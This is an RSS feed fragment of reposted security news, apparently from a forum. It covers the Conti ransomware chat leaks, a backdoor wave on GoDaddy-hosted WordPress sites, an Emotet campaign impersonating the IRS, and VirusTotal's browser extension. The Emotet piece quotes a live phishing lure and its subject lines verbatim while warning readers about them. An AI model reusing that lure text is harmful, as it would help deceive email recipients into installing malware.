	<a href="https://www.ghacks.net/2022/03/16/display-all-threats-that-windows-defender-detected-with-windeflogview/" rel="external nofollow">Display all threats that Windows Defender detected with WinDefLogView</a>
</p>
]]></description><guid isPermaLink="false">4768</guid><pubDate>Wed, 16 Mar 2022 18:26:35 +0000</pubDate></item><item><title>The Workaday Life of the World&#x2019;s Most Dangerous Ransomware Gang</title><link>https://nsaneforums.com/news/security-privacy-news/the-workaday-life-of-the-world%E2%80%99s-most-dangerous-ransomware-gang-r4767/</link><description><![CDATA[<p>
	The Conti ransomware gang was on top of the world. The sprawling network of cybercriminals extorted <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-ransomware/"}' data-offer-url="https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-ransomware/" href="https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-ransomware/" rel="external nofollow" target="_blank">$180 million from its victims last year</a>, eclipsing the earnings of all other <a href="https://www.wired.com/tag/ransomware" rel="external nofollow">ransomware</a> gangs. Then it backed <a href="https://www.wired.com/story/ukraine-it-army-russia-war-cyberattacks-ddos/" rel="external nofollow">Vladimir Putin’s invasion of Ukraine</a>. And it all started falling apart.
</p>

<p>
	 
</p>

<p>
	Conti’s implosion started with a single post on the group’s website, usually reserved for posting the names of its victims. Hours after Russian troops crossed Ukrainian borders on February 24, Conti <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://twitter.com/BrettCallow/status/1497249143663652865"}' data-offer-url="https://twitter.com/BrettCallow/status/1497249143663652865" href="https://twitter.com/BrettCallow/status/1497249143663652865" rel="external nofollow" target="_blank">offered</a> its “full support” to the Russian government and threatened to hack critical infrastructure belonging to anyone who dared to <a href="https://www.wired.com/story/hacktivists-pandemonium-russia-war-ukraine/" rel="external nofollow">launch cyberattacks against Russia</a>.
</p>

<p>
	 
</p>

<p>
	But while many Conti members <a href="https://www.wired.com/story/cl0p-ransomware-russia-putin-biden/" rel="external nofollow">live in Russia</a>, its scope is international. The war has divided the group; privately, some had railed <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://twitter.com/HoldSecurity/status/1499186845699170305"}' data-offer-url="https://twitter.com/HoldSecurity/status/1499186845699170305" href="https://twitter.com/HoldSecurity/status/1499186845699170305" rel="external nofollow" target="_blank">against Putin’s invasion</a>. And while Conti’s ringleaders scrambled to retract their statement, it was too late. The damage had been done. Especially because the dozens of people with access to Conti’s files and internal chat systems included a Ukrainian cybersecurity researcher who had infiltrated the group. They proceeded to rip Conti wide open.
</p>

<p>
	 
</p>

<p>
	On February 28, a newly created Twitter account called @ContiLeaks released more than <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://intelx.io/?did=c1a56526-a254-4536-952f-cd9926f587c3"}' data-offer-url="https://intelx.io/?did=c1a56526-a254-4536-952f-cd9926f587c3" href="https://intelx.io/?did=c1a56526-a254-4536-952f-cd9926f587c3" rel="external nofollow" target="_blank">60,000 chat messages</a> sent among members of the gang, its source code, and scores of internal Conti documents. The scope and scale of the leak is unprecedented; never before have the daily inner workings of a ransomware group been laid so bare. “Glory to Ukraine,” @ContiLeaks tweeted.
</p>

<p>
	 
</p>

<p>
	The leaked messages, reviewed in depth by WIRED, provide an unrivaled view into Conti’s operations and expose the ruthless nature of one of the world’s most successful <a href="https://www.wired.com/tag/ransomware/" rel="external nofollow">ransomware gangs</a>. Among their revelations are the group’s sophisticated businesslike hierarchy, its members’ personalities, how it dodges law enforcement, and details of its ransomware negotiations.
</p>

<p>
	 
</p>

<p>
	“We see the gang progressing. We see the gang living. We see the gang committing crimes and changing over the course of several years,” says Alex Holden, whose company <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://twitter.com/HoldSecurity/status/1498079060660006916"}' data-offer-url="https://twitter.com/HoldSecurity/status/1498079060660006916" href="https://twitter.com/HoldSecurity/status/1498079060660006916" rel="external nofollow" target="_blank">Hold Security</a> has tracked Conti members for most of the last decade. Holden, who was born in Ukraine but lives in America, says he knows the cybersecurity researcher who leaked the documents but says they are staying anonymous for safety reasons.
</p>

<p>
	 
</p>

<p>
	The Conti ransomware gang runs like any number of businesses around the world. It has multiple departments, from HR and administrators to coders and researchers. It has policies on how its hackers should process their code, and shares best practices to keep the group’s members hidden from law enforcement.
</p>

<p>
	 
</p>

<p>
	At the top of the business is Stern, who also goes by Demon and acts as the CEO—Conti members call Stern the “big boss.” All Conti members have pseudonymous usernames, which can change. Stern regularly chases people on their work and wants to account for their time. "Hello, how are you doing, write the results, successes or failures,” Stern wrote in one message sent to more than 50 Conti members in March 2021.
</p>

<p>
	 
</p>

<p>
	The Conti chat logs span two years, from the start of 2020 until February 27, 2022—the day before the messages leaked. In February <a href="https://www.wired.com/story/trickbot-malware-group-internal-messages/" rel="external nofollow">WIRED reported on a small number of the messages</a>, after they were provided by another source. The conversations are fragmented—think of taking your WhatsApp or Signal messages out of context—and were released in their original Russian form. WIRED reviewed a machine-translated version of the messages.
</p>

<p>
	 
</p>

<p>
	Some of the most revealing discussions take place between Stern and Mango, who acts as a general manager within Conti. Mango frequently launches into long monologues in private chats to Stern, either bemoaning team members or providing Stern with updates on the group’s projects. “They seem to be responsible for procuring different tools for different departments and making sure that the employees are being paid,” says Kimberly Goody, director of cybercrime analysis at security firm Mandiant.
</p>

<p>
	 
</p>

<p>
	The main Conti team consisted of 62 people, Mango told Stern in the middle of 2021. The exact number of Conti members fluctuates over time—at some points reaching around 100—as people join and leave the group. In one instance Stern says they are thinking of recruiting 100 more participants. “The group is so big that there are still middle managers,” group member Revers tells Meatball in June 2021.
</p>

<p>
	 
</p>

<p>
	Potential workers are funneled into Conti’s recruitment system from hacker forums and also legitimate job websites across the web. There’s even something of an onboarding process: When one new member joins the group they’re introduced to their team leader who will dish out their tasks. “I will hold a planning meeting in the evening and appoint you to the team,” Revers says in another message.
</p>

<p>
	 
</p>

<p>
	“What could be striking at first glance is the size, structure, and hierarchy of the organization,” says Soufiane Tahiri, a security researcher who has been <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://twitter.com/S0ufi4n3/status/1499299607523831810"}' data-offer-url="https://twitter.com/S0ufi4n3/status/1499299607523831810" href="https://twitter.com/S0ufi4n3/status/1499299607523831810" rel="external nofollow" target="_blank">reviewing the documents</a>. “They operate pretty much like a software development company, and contrary to popular belief it seems that many coders have salaries and do not take part in the paid ransom.”
</p>

<p>
	 
</p>

<p>
	Rank-and-file programmers are paid around $1,500 to $2,000 per month for their work, but those negotiating ransom payments can take a cut of the profits. The group even claimed to have <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://twitter.com/HoldSecurity/status/1498364291468169219"}' data-offer-url="https://twitter.com/HoldSecurity/status/1498364291468169219" href="https://twitter.com/HoldSecurity/status/1498364291468169219" rel="external nofollow" target="_blank">an unnamed journalist on its payroll</a> in April 2021, who would get a 5 percent cut by helping put pressure on victims to pay up. “We have salaries on the 1st and 15th, usually 2 times a month,” Mango tells one member of the group. Sometimes Conti members ask for extra money due to family problems—one claims they need more because their mother suffered from a heart attack—or because they’re cash-strapped.
</p>

<p>
	 
</p>

<p>
	Money is a frequent subject of discussion within Conti, on both a personal and a group level. They debate the ransoms, often into millions of dollars, that they plan to charge businesses for providing them with decryption keys for their files. They discuss budgets available for buying equipment and the expenses of running physical offices and servers. “They also share a Google doc spreadsheet that contains a list of expenses,” Goody says of one instance.
</p>

<p>
	 
</p>

<p>
	But some Conti members display the bombast of <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://www.businessinsider.com/millionaire-russian-hackers-evil-corp-car-pictures-video-2019-12?r=US&amp;IR=T#alongside-the-news-of-the-indictments-the-nca-released-a-variety-of-images-and-video-depicting-the-lavish-lifestyles-of-yakubets-and-his-cohorts-1"}' data-offer-url="https://www.businessinsider.com/millionaire-russian-hackers-evil-corp-car-pictures-video-2019-12?r=US&amp;IR=T#alongside-the-news-of-the-indictments-the-nca-released-a-variety-of-images-and-video-depicting-the-lavish-lifestyles-of-yakubets-and-his-cohorts-1" href="https://www.businessinsider.com/millionaire-russian-hackers-evil-corp-car-pictures-video-2019-12?r=US&amp;IR=T#alongside-the-news-of-the-indictments-the-nca-released-a-variety-of-images-and-video-depicting-the-lavish-lifestyles-of-yakubets-and-his-cohorts-1" rel="external nofollow" target="_blank">cybercriminals caught driving luxury cars and storing piles of cash</a>. Bio brags they have “80k” in their bank account and that they’ve “earned more this month with you than in 10 years.” They quickly backtrack, saying they probably exaggerated. On another occasion Skippy says they purchased a 27-inch iMac with their earnings—“wanted all my life.”
</p>

<p>
	 
</p>

<p>
	Skippy was also excited about taking a holiday from work. In November 2021 they said they planned to fly abroad in the new year but were warned by Mango they could be arrested. “It's up to you, of course, but I wouldn't fly abroad,” Mango said. Skippy replied asking if they are meant to “sit in Russia” for the rest of their life. Mango advised making sure their phone is “clean” and not taking their laptop. On other occasions, gang members ask their superiors if the holiday they requested has been approved and if they can finish early.
</p>

<p>
	 
</p>

<p>
	“We found through our logs that they have the full plethora of manuals of how they should maintain team spirit,” says Vitali Kremez, the CEO of security company AdvIntel. Kremez’s research is <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://twitter.com/VK_Intel/status/1498761290709409792"}' data-offer-url="https://twitter.com/VK_Intel/status/1498761290709409792" href="https://twitter.com/VK_Intel/status/1498761290709409792" rel="external nofollow" target="_blank">name-checked</a> by Conti multiple times throughout the chats. “They are not just making money, they are thinking about people and how to be more successful in the environment they have created.”
</p>

<p>
	 
</p>

<p>
	Many of the conversations are dull, daily chatter as group members become acquainted and even friendly with each other. On New Year's Eve 2021 some wished each other the best for 2022; members tell others they have caught Covid-19; they have issues with connectivity ("damn sorry my internet is dead"); and they bond over conversations about their partners or exes. The water cooler conversations are a stark contrast to Conti’s dark work.
</p>

<p>
	 
</p>

<p>
	Despite some camaraderie, staff turnover is high. Members appear to frequently leave, which necessitates constant recruitment. As WIRED previously reported, during 2020 the Conti members, as part of the wider Trickbot cybercrime gang, <a href="https://www.wired.com/story/trickbot-malware-group-internal-messages/" rel="external nofollow">discussed opening six offices in St. Petersburg</a> for new recruits. In July 2021, Mango messaged Stern and said they were interested in moving onto Moscow “time” and starting a new company. Echoing the rise in remote working over the last two years, Stern replied: "now it's better to manage the team from a laptop."
</p>

<p>
	 
</p>

<p>
	Most of the leaked Conti chat messages are DMs sent with Jabber, but the group coordinates attacks using Rocket.Chat, a Slack-style platform that can be easily encrypted. Like Slack or Microsoft Teams, Rocket.Chat lists a group’s channels down a left-hand panel.
</p>

<p>
	 
</p>

<p>
	“There were channels created specifically for potential victims or infected victims,” says Émilio Gonzalez, a Canadian security researcher who studied the Conti files and re-created the group’s Rocket.Chat <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://mobile.twitter.com/res260/status/1498849174456000523"}' data-offer-url="https://mobile.twitter.com/res260/status/1498849174456000523" href="https://mobile.twitter.com/res260/status/1498849174456000523" rel="external nofollow" target="_blank">conversations</a>. Companies are listed as “dead” or “done” in channel names. Each channel has two to four participants with different levels of seniority and responsibilities, Gonzalez says. “The conversation usually starts with credentials or access to a specific machine on the network of the victim.” The attacks then progress from there. A review of February 2022 Rocket.Chat messages by <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://theintercept.com/2022/03/14/russia-ukraine-conti-russian-hackers/"}' data-offer-url="https://theintercept.com/2022/03/14/russia-ukraine-conti-russian-hackers/" href="https://theintercept.com/2022/03/14/russia-ukraine-conti-russian-hackers/" rel="external nofollow" target="_blank">The Intercept</a> shows the group discussing drug use and child sexual abuse content in general channels, and making anti-Semitic comments about Ukrainian president Volodymyr Zelensky.
</p>

<p>
	 
</p>

<p>
	Beyond its chat messages, Conti uses common tools to organize. The team regularly references the <a href="https://www.wired.com/story/tor-anonymity-easier-than-ever/" rel="external nofollow">Tor browser</a> for getting online and GPG and ProtonMail for encrypted emails, uses Privnote for self-destructing messages, and shares files through <a data-event-click='{"element":"ExternalLink","outgoingURL":"http://file.io"}' data-offer-url="http://file.io" href="http://file.io" rel="external nofollow" target="_blank">file.io</a>, <a data-event-click='{"element":"ExternalLink","outgoingURL":"http://qaz.im"}' data-offer-url="http://qaz.im" href="http://qaz.im" rel="external nofollow" target="_blank">qaz.im</a>, and Firefox’s discontinued Send service. They also use databases, such as Crunchbase, to gather intelligence on the businesses they want to target.
</p>

<p>
	 
</p>

<p>
	Within Conti’s organizational structure is a team dedicated to open source intelligence that includes learning about potential threats. The group tried to purchase antivirus systems from security companies to test their malware against—creating <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://news.sophos.com/en-us/2022/03/04/countermeasures-and-observability-key-to-defending-against-attackers-trying-to-buy-security-products/"}' data-offer-url="https://news.sophos.com/en-us/2022/03/04/countermeasures-and-observability-key-to-defending-against-attackers-trying-to-buy-security-products/" href="https://news.sophos.com/en-us/2022/03/04/countermeasures-and-observability-key-to-defending-against-attackers-trying-to-buy-security-products/" rel="external nofollow" target="_blank">fake companies to do so</a>. They circulate YouTube videos about the latest security research, watch what researchers say about them, and share news articles about the group. (One Conti member sent Stern a Russian summary of <a href="https://www.wired.com/story/trickbot-malware-group-internal-messages/" rel="external nofollow">WIRED’s February story about the Trickbot group</a> the day after it was published).
</p>

<p>
	 
</p>

<p>
	As with any workplace, Conti members get frustrated with their colleagues. People don’t reply to messages, they vanish while working (“he went to get a haircut”), and they complain about long working hours. “For my part, I do not agree with the idea that I should be in touch 24 hours,” Driver complained in March 2021. Working all hours of the day “is a direct path to burnout,” they said.
</p>

<p>
	 
</p>

<p>
	The gang fines members who underperform or don’t show up for work, <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/"}' data-offer-url="https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/" href="https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/" rel="external nofollow" target="_blank">analysis of the chats</a> by security firm CheckPoint shows. “I have 100 people here, half of them, even 10 percent, do not do what they need,” Stern said to Mango in the summer of 2021. “And they only ask for money, because they think that they are fucking useful.” At another point, Stern scolds one person: “everyone works except for you.”
</p>

<p>
	 
</p>

<p>
	The Conti member Dollar is a particular pain. On January 20, 2022, the handle Cyberganster launched into a tirade about Dollar to Mango. “Let's get the dollar out of the game,” Cyberganster writes. “He is a fucked up bastard.” It’s claimed that Dollar targeted hospitals with the group’s ransomware despite being told not to. Conti members say they have a rule of not attacking hospitals or medical centers, although a May 2021 attack against <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://www.google.com/search?q=conti+health+service+ireland&amp;oq=conti+health+service+ireland&amp;aqs=chrome..69i57.5316j0j9&amp;sourceid=chrome&amp;ie=UTF-8"}' data-offer-url="https://www.google.com/search?q=conti+health+service+ireland&amp;oq=conti+health+service+ireland&amp;aqs=chrome..69i57.5316j0j9&amp;sourceid=chrome&amp;ie=UTF-8" href="https://www.google.com/search?q=conti+health+service+ireland&amp;oq=conti+health+service+ireland&amp;aqs=chrome..69i57.5316j0j9&amp;sourceid=chrome&amp;ie=UTF-8" rel="external nofollow" target="_blank">Ireland’s health service cost</a> the organization $600 million to recover from. Six days after the complaint from Cybergangster, Mango confronts Dollar. “You really [are] more problems than good,” one message in a series of 11 says. Mango says “everyone constantly complains about you and gets angry” and accuses Dollar of spoiling the gang’s “reputation” by targeting hospitals.
</p>

<p>
	 
</p>

<p>
	Despite their everyday work life being exposed, the Conti group hasn’t gone away. But the messages include a trail of personal details, such as the handles they use online, Bitcoin addresses, and email addresses. “If this information is true, it definitely makes life easier for law enforcement,” says Tahiri. “By dismantling the group behind Trickbot/Conti we can be sure that the whole infrastructure will suffer.” It’s something the group’s members are well aware of: “We are already in the news,” read one of the last messages sent before the leak.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/conti-leaks-ransomware-work-life/" rel="external nofollow">The Workaday Life of the World’s Most Dangerous Ransomware Gang</a>
</p>

<p>
	 
</p>

<p>
	(May require free registration to view)
</p>
]]></description><guid isPermaLink="false">4767</guid><pubDate>Wed, 16 Mar 2022 18:23:20 +0000</pubDate></item><item><title>Hundreds of GoDaddy-hosted sites backdoored in a single day</title><link>https://nsaneforums.com/news/security-privacy-news/hundreds-of-godaddy-hosted-sites-backdoored-in-a-single-day-r4766/</link><description><![CDATA[<p>
	Internet security analysts have spotted a spike in backdoor infections on WordPress websites hosted on GoDaddy's Managed WordPress service, all featuring an identical backdoor payload.
</p>

<p>
	 
</p>

<p>
	The case affects internet service resellers such as MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe Managed WordPress.
</p>

<p>
	 
</p>

<p>
	The discovery comes from Wordfence, whose team <a href="http://www.wordfence.com/blog/2022/03/increase-in-malware-sightings-on-godaddy-managed-hosting/" rel="external nofollow" target="_blank">first observed the malicious activity</a> on March 11, 2022, with 298 websites infected by the backdoor within 24 hours, 281 of which were hosted on GoDaddy.
</p>

<p>
	 
</p>

<p>
	<img alt="diagram(5).jpg" class="ipsImage" data-ratio="75.10" height="300" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/diagram(5).jpg">
</p>

<div>
	<figure>
		<figcaption>
			Backdoor infections monitor (Wordfence)
		</figcaption>
	</figure>
</div>

<h2>
	Old template spammer
</h2>

<p>
	The backdoor infecting all sites is a Google search SEO-poisoning tool dating from 2015, injected into the wp-config.php file, that fetches spam link templates from the C2 and uses them to inject malicious pages into search results.
</p>

<p>
	 
</p>

<p>
	The campaign predominantly uses pharmaceutical spam templates, which are served to visitors of the compromised websites instead of the actual content.
</p>

<p>
	 
</p>

<p>
	The goal of these templates is likely to entice the victims to make purchases of fake products, losing money and payment details to the threat actors.
</p>

<p>
	 
</p>

<p>
	Additionally, the actors can harm a website's reputation by altering its content and making the breach evident, but this doesn't seem to be the actors' aim at this time.
</p>

<p>
	 
</p>

<p>
	This type of attack is harder to detect and stop from the user's side because the injection happens on the server rather than in the browser, so local internet security tools won't see anything suspicious.
</p>

<h2>
	Supply chain attack?
</h2>

<p>
	The intrusion vector hasn't been determined, so while this looks suspiciously close to a supply chain attack, it hasn't been confirmed.
</p>

<p>
	 
</p>

<p>
	Bleeping Computer has contacted GoDaddy to find out more about this possibility, but we have not heard back yet.
</p>

<p>
	 
</p>

<p>
	Notably, GoDaddy <a href="https://www.bleepingcomputer.com/news/security/godaddy-data-breach-hits-wordpress-hosting-services-resellers/" target="_blank" rel="external nofollow">disclosed a data breach</a> in November 2021 that affected 1.2 million customers and multiple Managed WordPress service resellers, including the six mentioned in the introduction.
</p>

<p>
	 
</p>

<p>
	That breach involved unauthorized access to the system that provisions the company's Managed WordPress sites. As such, it's not far-fetched to suggest that the two occurrences might be linked.
</p>

<p>
	 
</p>

<p>
	In any case, if your website is hosted on GoDaddy's Managed WordPress platform, make sure to scan your wp-config.php file to locate potential backdoor injections.
</p>

<p>
	 
</p>

<p>
	<img alt="backdoor(1).png" class="ipsImage" data-ratio="75.10" height="433" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/backdoor(1).png">
</p>

<div>
	<figure>
		<figcaption>
			What the injected encoded backdoor looks like (Wordfence)
		</figcaption>
	</figure>
</div>

<p>
	Wordfence also reminds admins that while removing the backdoor should be the first step, removing spam search engine results should also be a priority.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/hundreds-of-godaddy-hosted-sites-backdoored-in-a-single-day/" rel="external nofollow">Hundreds of GoDaddy-hosted sites backdoored in a single day</a>
</p>
]]></description><guid isPermaLink="false">4766</guid><pubDate>Wed, 16 Mar 2022 18:18:36 +0000</pubDate></item><item><title>Emotet malware campaign impersonates the IRS for 2022 tax season</title><link>https://nsaneforums.com/news/security-privacy-news/emotet-malware-campaign-impersonates-the-irs-for-2022-tax-season-r4765/</link><description><![CDATA[<p>
	The Emotet malware botnet is taking advantage of the 2022 U.S. tax season by sending out malicious emails pretending to be the Internal Revenue Service sending tax forms or federal returns.
</p>

<p>
	 
</p>

<p>
	Emotet is a malware infection distributed through phishing emails with attached Word or Excel documents containing malicious macros. Once these documents are opened, they will trick the user into enabling macros that will download the Emotet malware onto the computer.
</p>

<p>
	 
</p>

<p>
	Once Emotet is installed, the malware will steal victims' emails to use in future <a href="https://www.bleepingcomputer.com/news/security/here-are-the-new-emotet-spam-campaigns-hitting-mailboxes-worldwide/" rel="external nofollow" target="_blank">reply-chain attacks</a>, send further spam emails, and ultimately install other malware that could <a href="https://www.bleepingcomputer.com/news/security/emotet-botnet-comeback-orchestrated-by-conti-ransomware-gang/" rel="external nofollow" target="_blank">lead to a Conti ransomware attack</a> on the compromised network.
</p>

<h2>
	Emotet impersonates IRS.gov
</h2>

<p>
	In a new report by email security firm <a href="https://cofense.com/" rel="external nofollow" target="_blank">Cofense</a>, researchers have spotted multiple phishing campaigns impersonating the Internal Revenue Service (IRS.gov) that use lures related to the 2022 U.S. tax season.
</p>

<p>
	 
</p>

<p>
	These emails pretend to be the IRS sending the recipient their 2021 Tax Return, W-9 forms, and other tax documents commonly required for the tax season.
</p>

<p>
	 
</p>

<p>
	<img alt="phishing-email.jpg" class="ipsImage" data-ratio="75.10" height="527" width="720" src="https://www.bleepstatic.com/images/news/malware/e/emotet/2022-tax-season/phishing-email.jpg">
</p>

<p>
	Phishing email pretending to be from the IRS<br>
	Source: Cofense
</p>

<p>
	 
</p>

<p>
	While the email subjects and text of the IRS-themed emails vary, the general lure is that the IRS is contacting your business with either completed tax forms or ones you need to fill out and return to them.
</p>

<p>
	 
</p>

<p>
	An example of the text found in one of these emails is:
</p>

<pre style="margin-left: 40px;">Attached please find your W-9 for [company_name] LLC. Password is 24509.

Please complete the attached, fillable form and return to me at your earliest. If you have ANY questions, please give me a shout!

Let me know if you would like a hard copy email as well.
</pre>

<p>
	According to <a href="https://cofense.com/blog/emotet-spoofs-irs-in-tax-season/" rel="external nofollow" target="_blank">Cofense's report</a> published today, the phishing campaign is using numerous email subjects related to the U.S. tax season, including:
</p>

<pre style="margin-left: 40px;">IRS Tax Forms W-9
Incorrect Form Selection
INCOME TAX RETURN 2021</pre>

<p>
	<img alt="emotet-income-tax-return-email.jpg" class="ipsImage" data-ratio="75.10" height="530" width="720" src="https://www.bleepstatic.com/images/news/malware/e/emotet/2022-tax-season/emotet-income-tax-return-email.jpg">
</p>

<p>
	Another Emotet 2022 tax season phishing email<br>
	Source: Cofense
</p>

<p>
	 
</p>

<p>
	Attached to the emails are zip files, or HTML files that lead to zip files, which are password-protected to make them harder for secure email gateways to detect.
</p>

<p>
	 
</p>

<p>
	In tests conducted by BleepingComputer, these zip files fail to be parsed correctly by Windows' built-in archive extractor, potentially causing the campaign to have less impact.
</p>

<p>
	 
</p>

<p>
	However, third-party archive programs, like 7-Zip, have no problem extracting the files, as seen below.
</p>

<p>
	 
</p>

<p>
	<img alt="password-prompt.jpg" class="ipsImage" data-ratio="62.92" height="423" width="720" src="https://www.bleepstatic.com/images/news/malware/e/emotet/2022-tax-season/password-prompt.jpg">
</p>

<p>
	Password-protected zip attachment<br>
	Source: BleepingComputer
</p>

<p>
	 
</p>

<p>
	Inside the zip files is a 'W-9 form.xslm' Excel file that, when opened, prompts the user to click on the "Enable Editing" and "Enable Content" buttons to view the document correctly.
</p>

<p>
	 
</p>

<p>
	<img alt="excel-attachment.jpg" class="ipsImage" data-ratio="72.08" height="406" width="720" src="https://www.bleepstatic.com/images/news/malware/e/emotet/2022-tax-season/excel-attachment.jpg">
</p>

<p>
	Malicious Excel document<br>
	Source: BleepingComputer
</p>

<p>
	 
</p>

<p>
	Once a user clicks on these buttons, malicious macros will be executed that download and install the Emotet malware from hacked WordPress sites.
</p>

<p>
	 
</p>

<p>
	Once Emotet is installed, the malware will download additional payloads, which have commonly been <a href="https://www.bleepingcomputer.com/news/security/emotet-starts-dropping-cobalt-strike-again-for-faster-attacks/" rel="external nofollow" target="_blank">Cobalt Strike in recent campaigns</a>.
</p>

<p>
	 
</p>

<p>
	However, the Emotet research group Cryptolaemus has also seen Emotet dropping the <a href="https://www.bleepingcomputer.com/news/security/new-systembc-malware-uses-your-pc-to-hide-malicious-traffic/" rel="external nofollow" target="_blank">SystemBC remote access Trojan</a>.
</p>

<p>
	 
</p>

<p>
	<a href="https://twitter.com/Cryptolaemus1/status/1502069552246575105" rel="external nofollow" target="_blank">Cryptolaemus tweet on Emotet dropping SystemBC</a>
</p>

<p>
	 
</p>

<p>
	With Emotet now developed by the Conti Ransomware gang, all organizations, large and small, should be on the lookout for these phishing campaigns as they ultimately lead to ransomware attacks and data exfiltration.
</p>

<p>
	 
</p>

<p>
	As always, it is vital to remember that the <a href="https://www.irs.gov/newsroom/security-summit-warns-of-new-irs-impersonation-email-scam-reminds-taxpayers-the-irs-does-not-send-unsolicited-emails" rel="external nofollow" target="_blank">IRS never sends unsolicited emails</a> and corresponds only through the postal service. Therefore, if you receive an email claiming to be from the IRS, mark it as spam, and delete the email.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/emotet-malware-campaign-impersonates-the-irs-for-2022-tax-season/" rel="external nofollow">Emotet malware campaign impersonates the IRS for 2022 tax season</a>
</p>
]]></description><guid isPermaLink="false">4765</guid><pubDate>Wed, 16 Mar 2022 18:15:59 +0000</pubDate></item><item><title>Virus scanning service VirusTotal releases VT4Browsers extension for Chrome and Firefox</title><link>https://nsaneforums.com/news/security-privacy-news/virus-scanning-service-virustotal-releases-vt4browsers-extension-for-chrome-and-firefox-r4749/</link><description><![CDATA[<p>
	VirusTotal is a useful online virus scanning service that <a data-wpel-link="internal" href="https://www.ghacks.net/2012/09/07/google-acquires-online-virus-scanning-service-virustotal/" rel="external nofollow">Google acquired</a> in 2012. The developers of the service have released VT4Browsers, an updated web browser extension for Firefox and Google Chrome.
</p>

<p>
	 
</p>

<p>
	<img alt="virustotal-vt4browsers.webp" class="ipsImage" data-ratio="75.10" height="515" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/03/virustotal-vt4browsers.webp">
</p>

<p>
	 
</p>


<p>
	VT4Browsers submits certain file downloads automatically to the virus scanning service for checking. Users may then click on a link displayed by the extension to open the scan results on the VirusTotal website.
</p>

<p>
	 
</p>

<p>
	The extension submits downloads with the exception of document file types by default. Users of the extension may change the default behavior in the settings.
</p>

<p>
	 
</p>

<p>
	<img alt="virustotal-browser-extension.webp" class="ipsImage" data-ratio="75.10" height="515" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/03/virustotal-browser-extension.webp">
</p>

<p>
	 
</p>

<p>
	The settings are divided into a public part and a part that is reserved for users with an API key. The public part includes the following options:
</p>

<p>
	 
</p>

<ul>
	<li>
		Scan downloads with VirusTotal -- this determines whether file downloads are submitted to the service.
	</li>
	<li>
		Don't scan documents -- this determines whether document file types, e.g., pdf or docx, are submitted. These file types are not submitted by default.
	</li>
	<li>
		Show "Sent to VirusTotal" prompt when downloading files -- displays a prompt to the user to submit downloads on demand and not automatically.
	</li>
	<li>
		Pause downloads when sending to VirusTotal -- do not process downloads until files have been submitted to VirusTotal.
	</li>
	<li>
		Send anonymous passive DNS data to VirusTotal -- submits domain name to IP address mappings for DNS resolutions the browser performs to VirusTotal. Enabled by default.
	</li>
</ul>

<p>
	 
</p>

<p>
	Users may want to disable the sending of anonymous passive DNS data and enable the "sent to VirusTotal" prompt to be in control of the sending. The extension does not reveal all document file types that it blocks from sending, and most users may want to be in control when it comes to the sending of files to the service.
</p>

<p>
	 
</p>

<p>
	The main change that the new VirusTotal browser extension introduces is support for the VT Augment widget. It allows users to link an API key in the extension to use advanced functionality.
</p>

<p>
	 
</p>

<p>
	<img alt="virustotal-api.webp" class="ipsImage" data-ratio="75.10" height="515" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/03/virustotal-api.webp">
</p>

<p>
	 
</p>

<p>
	The functionality consumes API lookups whenever it is used. It allows users to "highlight or enrich IoCs (hashes, domains, IPs, URLs) automatically."
</p>

<p>
	 
</p>

<p>
	The difference between highlighting and enrichment is the following:
</p>

<p>
	 
</p>

<p>
	The highlight feature identifies IoCs and adds a VirusTotal icon next to each IoC. When the icon is clicked an API call is performed to embed the IoC detection ratio and display the VT AUGMENT widget as a side panel. API quota is only consumed when you click on an IoC icon.
</p>

<p>
	 
</p>

<p>
	For each IoC identified on a site, the enrichment feature automatically queries the VT API and embeds the IoC’s security vendors' detection ratio/score next to the IoC. Clicking on the VirusTotal icon or detection ratio next to each IoC will then display the VT AUGMENT widget as a side panel. This setting can generate API lookup spikes and is only recommended for premium API keys.
</p>

<p>
	 
</p>

<p>
	A support article on the <a data-wpel-link="external" href="https://support.virustotal.com/hc/en-us/articles/4413290242705" rel="external nofollow" target="_blank">VirusTotal website</a> provides additional information on the new options.
</p>

<p>
	 
</p>

<p>
	VT4Browsers is available for <a data-wpel-link="external" href="https://chrome.google.com/webstore/detail/vt4browsers/efbjojhplkelaegfbieplglfidafgoka/related" rel="external nofollow" target="_blank">Chrome</a> and <a data-wpel-link="external" href="https://addons.mozilla.org/en-US/firefox/addon/vt4browsers/" rel="external nofollow" target="_blank">Firefox</a> officially. Most Chromium-based browsers should install the extension without any issues. A quick test in Brave and Vivaldi was successful in that regard.
</p>

<p>
	 
</p>

<p>
	Now You: do you use VirusTotal or other virus scanning services?
</p>

<p>
	 
</p>


<p>
	 
</p>

<p>
